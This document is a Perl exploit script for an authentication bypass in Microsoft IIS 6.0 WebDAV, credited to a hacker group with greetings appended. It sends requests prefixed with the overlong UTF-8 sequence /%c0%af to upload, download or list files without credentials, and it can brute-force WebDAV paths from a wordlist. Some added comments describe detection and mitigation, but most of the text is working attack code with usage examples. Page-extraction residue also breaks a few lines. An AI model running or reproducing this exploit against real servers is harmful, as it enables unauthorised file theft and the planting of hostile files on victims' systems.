======================================
MS IIS 6.0 WebDAV Auth. Bypass Exploit
======================================
# Author : FoX HaCkEr
#Contact : MKQ@HoTmAiL.CoM
# SiTe : www.sec4ever.com
======================================================================================================
#!/usr/bin/perl
# ********* !!! WARNING !!! *********
# * FOR SECURITY TESTiNG ONLY! *
# ***********************************
# MS IIS 6.0 WebDAV Auth. Bypass Exploit v1.1
# v1.1 adds a brute-force directory function.
# v1.0 download, upload and list dir.
#
# Usage:
# IIS6_webdav.pl -target -port -method -webdavpath|-BruteForcePath [-file]
# -target eg.: 192.168.1.1
# -port eg.: 80
# -method eg.: g
# (p:PUT,g:GET,l:LIST)
# -webdavpath eg.: webdav
# -BruteForcePath eg.: brute force webdav path
# -file (optional) eg.: test.aspx
# Example:
# put a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx
# get a file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -x webdav -f test.aspx
# list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -x webdav
# brute force + list dir:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m l -b dirdic.txt
# brute force + get file:
# IIS6_webdav.pl -t 192.168.1.1 -p 80 -m g -b dirdic.txt -f test.aspx
use IO::Socket;use Getopt::Long;
use threads;
use threads::shared;
# Globals Go Here.
# Command-line state for the whole script. Option values are only checked for
# presence after parsing; $target and $file are later interpolated directly
# into request text and into local file opens.
my $target; # Host being probed.
my $port; # Webserver port.
my $method; # Method selector from -method: p (PUT), g (GET) or l (LIST).
my $xpath; # WebDAV path on Webserver.
my $bpath; # Local wordlist file used to guess the WebDAV directory.
my $file; # file name.
my $httpmethod; # HTTP verb derived from $method: PUT, GET or PROPFIND.
my $Host_Header; # The Host header has to be changed
# NOTE(review): the stray ';' inside the "target=s" entry below looks like
# residue from the page extraction rather than the author's text.
GetOptions(
"target=s" ; => \$target,
"port=i" => \$port,
"method=s" => \$method,
"xpath=s" => \$xpath,
"bpath=s" => \$bpath,
"file=s" => \$file,
# -help / -? prints the usage banner and exits with status 0.
"help|?" => sub {
hello();
exit(0);
}
);
# Collect one message per missing option. $error is never declared with my,
# so it is a package variable (the script does not enable strict).
$error .= "Error: You must specify a target host\n" if ((!$target));
$error .= "Error: You must specify a target port\n" if ((!$port));
$error .= "Error: You must specify a put,get or list method\n" if ((!$method));
$error .= "Error: You must specify a webdav path\n" if ((!$xpath) && (!$bpath));
$error .= "Error: You must specify a upload or download file name\n" if ((!$file) && $method != "l");
if ($error) {
print "Try $0 -help or -?' for more information.\n$error\n" ;
exit;
}
hello();
# Map the one-letter selector to the HTTP verb placed on the wire.
# "List" is implemented as a WebDAV PROPFIND; any other selector aborts.
if ($method eq "p") {
$httpmethod = "PUT";
} elsif ($method eq "g") {
$httpmethod = "GET";
} elsif ($method eq "l") {
$httpmethod = "PROPFIND";
} else {
print "$method Method not accept !!!\n";
exit(0);
}
# ************************************
# * We testing WebDAV methods first *
# ************************************
# Pre-flight: webdavtest() sends "OPTIONS /" and exits the script unless the
# response shows a Microsoft-IIS Server header, a DAV header and the chosen
# verb in the Public header. A server that does not advertise WebDAV stops
# the run here.
webdavtest($target,$port);
#end of WebDAV testing.
# ****************************************
# * We try to brute forceing WebDAV path *
# ****************************************
# With -bpath the WebDAV directory is taken from the wordlist scan in
# webdavbf() and replaces any -xpath value.
if ($bpath) {
$xpath = webdavbf($target,$port,$bpath);
}
#end of brute force
# Build the header block for the selected verb, then send a single request.
# What a defender sees on the wire from this section:
#   - HTTP/1.0 requests with only the headers built here (no User-Agent);
#   - a "Translate: f" header on PUT and GET;
#   - a request path that begins with "/%c0%af".
print "-" x 60 ."\n";
if ($httpmethod eq "PUT") {
my $content;
my $data;
#cacl file size
$filesize = -s $file;
print "$file size is $filesize bytes\n";
# Two-argument open on a bareword handle: the mode is taken from the file
# name itself, so -file values must be trusted by whoever runs this.
open(INFO, $file) || die("Could not open file!");
#@lines=<INFO>;
binmode(INFO); #binary
while( read(INFO, $data, $filesize))
{
$content .= $data;
}
close(INFO);
#print $content;
$Host_Header = "Translate: f\r\nHost: $target\r\nContent-Length: $filesize\r\n";
} elsif ($httpmethod eq "GET") {
$Host_Header = "Translate: f\r\nHost: $target\r\nConnection: close\r\n\r\n";
} elsif ($httpmethod eq "PROPFIND") {
# The header block declares Content-Length: 0 and an XML propfind body is
# then appended after the blank line; that mismatch is a further feature
# a detection rule can key on.
$Host_Header = "Host: $target\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
$Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
}
print "-" x 60 ."\n$httpmethod $file , Please wait ...\n"."-" x 60 ."\n";
# ************************
# * Sending HTTP request *
# ************************
# Every request path is prefixed with "/%c0%af". The bytes C0 AF are an
# overlong (non-shortest-form) UTF-8 encoding of "/", which a conforming
# client never emits; this is the authentication-bypass trigger named in the
# page title. Detection: alert on "%c0%af" (any case) in the logged URI of
# WebDAV verbs. Mitigation: apply the vendor fix for the IIS WebDAV Unicode
# handling flaw, disable WebDAV where it is not needed, and reject overlong
# UTF-8 at the filtering layer in front of IIS.
# sendraw2() is called with a 10 second timeout; a result of fewer than two
# lines is reported as a timeout.
if ($httpmethod eq "PUT") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header\r\n$content",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "GET") {
@results=sendraw2("$httpmethod /%c0%af$xpath/$file HTTP/1.0\r\n$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
} elsif ($httpmethod eq "PROPFIND") {
@results=sendraw2("$httpmethod /%c0%af$xpath/ HTTP/1.0\r\n$Host_Header",$target,$port,10);
if ($#results < 1){die "10s timeout to $target on port $port\n";}
}
#print @results;
# Classify the outcome from the status line only: any 2xx sets $flag to "on",
# everything else leaves it "off". For incident response this means a 2xx
# answer to a "/%c0%af..." request in the server log marks a request the
# server accepted, not merely an attempt.
$flag="off";
if ($results[0] =~ m|^HTTP/1\.[01] 2[0-9][0-9] |){
$flag="on";
} elsif ($results[0] =~ m|^HTTP/1\.[01] 4[0-9][0-9] |){
$flag="off";
# NOTE(review): the text after the closing brace on the next line is HTML
# entity residue from the page extraction, not Perl.
}&nb sp;
print "-" x 60 ."\n";
if ($flag eq "on") {
if ($httpmethod eq "PUT") {
print "$httpmethod $file from [$target:$port/$xpath] OK\r\n";
} elsif ($httpmethod eq "GET") {
# Find the "Accept-Ranges: bytes" response header; $line_no ends up as the
# 1-based position of that line (or the line count if it never appears).
my $line_no = 0;
my $counter = @results;
foreach $line (@results){
++$line_no;
if ($line =~ /^Accept-Ranges: bytes\r\n/){
last;
}
}
# Write file to disk
# Two-argument open with ">$file": the local output path comes straight from
# -file, and the bytes written come from the remote server. Anyone replaying
# this in a lab should treat the saved file as untrusted content.
open(OUTFILE, ">$file") or die "Could not write to file: $!\n";
binmode (OUTFILE);
# The slice starts two elements past the matched header line, presumably to
# skip the blank separator line -- TODO confirm against a real response.
print OUTFILE @results[$line_no+1..$counter];
close(OUTFILE);
print "$httpmethod $file from [$target:$port/$xpath] OK\r\nPlease check $file on local disk\r\n";
} elsif ($httpmethod eq "PROPFIND") {
print "$httpmethod path list from [$target:$port/$xpath] OK\r\n";
# Take the first response line that starts with an XML declaration, split it
# on "<a:href>" and print the text of each piece up to its next "<".
foreach $line (@results){
if ($line =~ /^\<\?xml version\=/i){
my @list = split("<a:href>", $line);
foreach $path (@list) {
$no = index($path,"<");
$result.=substr($path, 0, $no)."\n";
}
print $result;
; last;
}
}
}
} else {
print "$httpmethod $file from [$target:$port/$xpath] FAILED!!!\r\n";
}
print "-" x 60 ."\n";
exit(0);
# *************
# * Sendraw-2 *
# *************
# Send one raw request string over a new TCP connection and return the
# response as a list of lines.
#   $pstr     - complete request text, written to the socket verbatim
#   $realip   - target host, resolved with inet_aton
#   $realport - TCP port
#   $timeout  - seconds passed to alarm() around connect and around the read
# Returns the response lines on success, the one-element list ("0") when
# connect fails, and "Timeout" from the branch guarded by $flagexit. Callers
# in this file treat any result with fewer than two elements as a timeout.
sub sendraw2 {
my ($pstr,$realip,$realport,$timeout)=@_;
my $target2 = inet_aton($realip);
my $flagexit=0;
# ermm is installed as the SIGALRM handler for the alarms armed below.
$SIG{ALRM}=\&ermm;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems");
alarm($timeout);
# The socket address is packed by hand: family 2, port in network byte
# order, the 4-byte address, then 8 bytes of padding.
if (connect(S,pack "SnA4x8",2,$realport,$target2)){
alarm(0);
my @in;
# Make the socket the default output handle and unbuffer it, so the bare
# print below writes the request to the socket.
select(S); $|=1;
print $pstr;
alarm($timeout);
while(<S>){
if ($flagexit == 1){
close (S);
print STDOUT "Timeout\n";
return "Timeout";
}
push @in, $_;
}
alarm(0);
# Restore STDOUT as the default output handle before returning.
select(STDOUT);
close(S);
return @in;
} else {return "0";}
}
# SIGALRM handler installed by sendraw2(): sets the package variable
# $flagexit to 1 and closes the bareword socket handle S.
sub ermm{
$flagexit=1;
close (S);
}
# Pre-flight probe: send "OPTIONS / HTTP/1.0" to $testip:$testport and inspect
# the response headers. The script exits (status 0) when the Server header
# does not contain Microsoft-IIS, when the Public header does not list the
# verb held in the global $httpmethod, or when no DAV header was seen.
# Messages print the global $target rather than the $testip argument.
#
# Defensive reading: the Server, DAV and Public headers of an OPTIONS reply
# are the only gating signals used here. A server that does not advertise
# WebDAV fails this probe and the script stops, and an unauthenticated
# OPTIONS followed by "/%c0%af" requests from the same client is the
# sequence to look for in logs.
sub webdavtest {
my ($testip,$testport)=@_;
print "-" x 60 ."\n";
print "Testing WebDAV methods [$testip $testport]\n";
print "-" x 60 ."\n";
@results=sendraw2("OPTIONS / HTTP/1.0\r\n\r\n",$testip,$testport,10);
if ($#results < 1){die "10s timeout to $target on port $testport\n";}
#print @results;
# $flag records whether a DAV header has been seen so far.
$flag="off";
foreach $line (@results){
if ($line =~ /^Server: /){
# Keep the text after the first ':' and strip spaces from it.
($left,$right)=split(/\:/,$line);
$right =~ s/ //g;
print "$target : Server type is : $right";
if ($right !~ /Microsoft-IIS/i){
print "$target : Not a Microsoft IIS Server\n";
exit(0);
}
}
if ($line =~ /^DAV: /){
$flag="on";
}
# The Public header is only examined once a DAV header has been seen.
if ($line =~ /^Public: / && $flag eq "on"){
($left,$right)=split(/\:/,$line);
# NOTE(review): the leading characters on the next line are HTML entity
# residue from the page extraction, not Perl.
&n bsp; $right =~ s/ //g;
print "$target : Method type is : $right";
# The verb name is interpolated into the pattern unquoted; it is one of the
# three fixed strings assigned at top level.
if ($right !~ /$httpmethod/i){
print "$target : Not allow $httpmethod on this WebDAV Server\n";
exit(0);
} else {
$flag="on";
}
}
}
if ($flag eq "off") {
print "$target : WebDAV disable\n";
exit(0);
}
}
# Directory discovery: read candidate directory names from the local wordlist
# $bfpath and send "PROPFIND /<name>/" for each to $bfip:$bfport. The first
# name whose status line is 401 is returned; if none matches, the script
# prints a message and exits. These probe requests do not carry the
# "/%c0%af" prefix.
#
# Defensive reading: the scan appears in server logs as a run of PROPFIND
# requests from one client against many directory names, stopping at the
# first 401. Rate-based alerting on PROPFIND and on 401 responses to WebDAV
# verbs covers this phase.
sub webdavbf {
my ($bfip,$bfport,$bfpath)=@_;
print "-" x 60 ."\n";
print "Try to brute forceing WebDAV path ...\n";
print "-" x 60 ."\n";
# NOTE(review): the leading characters on the next line are HTML entity
# residue from the page extraction. The open itself is the two-argument
# form on a bareword handle.
& nbsp; open(BF, $bfpath) || die("Could not open file!");
# foreach over <BF> reads the whole wordlist into memory before iterating.
foreach $lines (<BF>){
chomp($lines);
$Host_Header = "Host: $bfip\r\nConnection: close\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nContent-Length: 0\r\n\r\n";
$Host_Header = $Host_Header."<?xml version=\"1.0\" encoding=\"utf-8\"?><D:propfind xmlns:D=\"DAV:\"><D:prop xmlns:R=\"http://apache.org/dav/props/\"><R:bigbox/><R:author/><R:DingALing/><R:Random/></D:prop></D:propfind>";
@results=sendraw2("PROPFIND /$lines/ HTTP/1.0\r\n$Host_Header",$bfip,$bfport,10);
if ($#results < 1){die "10s timeout to $bfip on port $bfport\n";}
print "[$lines]...$results[0]";
# maybe this response:
# HTTP/1.1 207 Multi-Status
# A 401 status is taken as the sign of a directory that requires
# authentication. The function returns from inside the loop, so the "last"
# below is never reached and BF is not closed on this path.
if ($results[0] =~ m|^HTTP/1\.[01] 401 |){
print "Find out path on [$lines]\n";
return $lines;
last;
}
}
close(BF) ;
print "Sorry... We can not find any more path... :(\n";
exit(0);
}
sub hello{
    # Print the tool banner, the option summary and one usage example to the
    # currently selected output handle. $0 expands to the script name.
    my @banner_lines = (
        "\n",
        "\t ##################################################\n",
        "\t # MS IIS 6.0 WebDAV Auth. Bypass Exploit V1.0 #\n",
        "\t # **************** !!! WARNING !!! **************#\n",
        "\t # **** FOR PRIV8 AND EDUCATIONAL USE ONLY! ****#\n",
        "\t # ***********************************************#\n",
        "\t # Written by csgcsg 090529 ; #\n",
        "\t ###################################################\n",
    );
    my @option_lines = (
        "\n\t $0 -target -port -method -webdavpath [-file]\n",
        "\n\t -target\t\t eg.: 192.168.1.1\n",
        "\t -port\t\t\t eg.: 80\n",
        "\t -method (p:PUT, g:GET, l:LIST)\t eg.: g\n",
        "\t -webdavpath|-bruteForcePath\t\t eg.: webdav\n",
        "\t -file\t\t\t eg.: test.aspx\n\n",
        "\tUsage eg.: \n\t$0 -t 192.168.1.1 -p 80 -m p -x webdav -f test.aspx\n",
    );
    # One print of the combined list emits the same bytes, in the same
    # order, as printing each string separately.
    print @banner_lines, @option_lines;
};
=======================================================================================================
Gr33ts: Mr.MoDaMeR & SILVER FoX & Z7FAN HaCkEr & Black Cobra & KinG oF CnTroL & MadjiX & Ma3sTr0-Dz
Lagripe-Dz & Shi6oN HaCkEr & ALL Members sec4ever & ALL MY Friend in MsN & ALL Members p0c team &